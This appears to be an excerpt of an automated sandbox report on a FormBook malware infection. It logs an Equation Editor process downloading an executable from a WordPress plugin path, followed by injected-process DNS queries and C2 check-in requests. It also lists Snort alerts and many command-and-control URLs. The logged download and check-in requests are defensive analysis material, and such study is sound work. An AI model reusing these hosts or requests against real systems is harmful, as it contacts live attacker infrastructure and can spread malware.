          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficDNS query: name: mail.treeoflifeadventures.com
          Source: global trafficDNS query: name: www.narrativepages.com
          Source: global trafficDNS query: name: www.credit-cards-16215.bond
          Source: global trafficDNS query: name: www.luxpsy.com
          Source: global trafficDNS query: name: www.sxchenggu.com
          Source: global trafficDNS query: name: www.centralngs.com
          Source: global trafficDNS query: name: www.west-paws.com
          Source: global trafficDNS query: name: www.pj69vip12.cyou
          Source: global trafficDNS query: name: www.miamirealestatecommercial.com
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 4x nop then pop edi7_2_00417D74
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi10_2_000D7D74
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.224.212.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.195.240.19:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 38.11.36.68:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 34.149.87.45:80
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 206.188.193.211:80
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 206.188.193.211:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.188.193.211 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.credit-cards-16215.bond
          Source: C:\Windows\explorer.exeDomain query: www.luxpsy.com
          Source: C:\Windows\explorer.exeDomain query: www.centralngs.com
          Source: C:\Windows\explorer.exeDomain query: www.west-paws.com
          Source: C:\Windows\explorer.exeDomain query: www.miamirealestatecommercial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sxchenggu.com
          Source: C:\Windows\explorer.exeNetwork Connect: 38.11.36.68 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.narrativepages.com
          Source: C:\Windows\explorer.exeDomain query: www.pj69vip12.cyou
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49162 -> 41.185.64.155:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49164 -> 103.224.212.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 91.195.240.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 38.11.36.68:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.149.87.45:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.fakeittilyoumakeitfinance.com/ge06/
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41 HTTP/1.1Host: www.narrativepages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=rR7wD3U/ZV6dBjvSlK9KatPYfQs2u0cQXMzY4PO5wsCIJRW7frAjgDUNgmxBJMGJ1YneTQ==&BL3=KP-PB41 HTTP/1.1Host: www.luxpsy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41 HTTP/1.1Host: www.sxchenggu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41 HTTP/1.1Host: www.centralngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41 HTTP/1.1Host: www.west-paws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1Host: www.miamirealestatecommercial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1Host: www.miamirealestatecommercial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mail.treeoflifeadventures.comConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: GridhostZA GridhostZA
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewIP Address: 41.185.64.155 41.185.64.155
          Source: explorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: EQNEDT32.EXE, 00000002.00000002.412473279.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shel
          Source: word.exe, word.exe, 00000005.00000000.409599934.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, jakatrol2.1[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: word.exe, 00000005.00000000.409599934.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, jakatrol2.1[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bowllywood.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bowllywood.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bowllywood.com/ge06/www.moderco.net
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bowllywood.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bulgarianarchive.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bulgarianarchive.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bulgarianarchive.com/ge06/www.hndswicco.best
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bulgarianarchive.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.centralngs.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.centralngs.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.centralngs.com/ge06/www.west-paws.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.centralngs.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.credit-cards-16215.bond
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.credit-cards-16215.bond/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.credit-cards-16215.bond/ge06/www.versebuild.xyz
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.credit-cards-16215.bondReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.daqtpt.cfd
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.daqtpt.cfd/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.daqtpt.cfd/ge06/www.ecoboat.world
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.daqtpt.cfdReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecoboat.world
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecoboat.world/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecoboat.world/ge06/www.bulgarianarchive.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecoboat.worldReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fakeittilyoumakeitfinance.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fakeittilyoumakeitfinance.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fakeittilyoumakeitfinance.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hndswicco.best
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hndswicco.best/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hndswicco.best/ge06/www.fakeittilyoumakeitfinance.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hndswicco.bestReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxpsy.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxpsy.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxpsy.com/ge06/www.sxchenggu.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxpsy.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.miamirealestatecommercial.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.miamirealestatecommercial.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.miamirealestatecommercial.com/ge06/www.bowllywood.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.miamirealestatecommercial.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moderco.net
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moderco.net/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moderco.net/ge06/www.daqtpt.cfd
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.moderco.netReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.narrativepages.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.narrativepages.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.narrativepages.com/ge06/www.credit-cards-16215.bond
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.narrativepages.comReferer:
          Source: explorer.exe, 00000008.00000000.413347575.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413347575.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003E9C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.413347575.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413347575.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003E9C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pj69vip12.cyou
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pj69vip12.cyou/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pj69vip12.cyou/ge06/www.miamirealestatecommercial.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pj69vip12.cyouReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxchenggu.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxchenggu.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxchenggu.com/ge06/www.centralngs.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxchenggu.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versebuild.xyz
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versebuild.xyz/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versebuild.xyz/ge06/www.luxpsy.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versebuild.xyzReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.west-paws.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.west-paws.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.west-paws.com/ge06/www.pj69vip12.cyou
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.west-paws.comReferer:
          Source: explorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
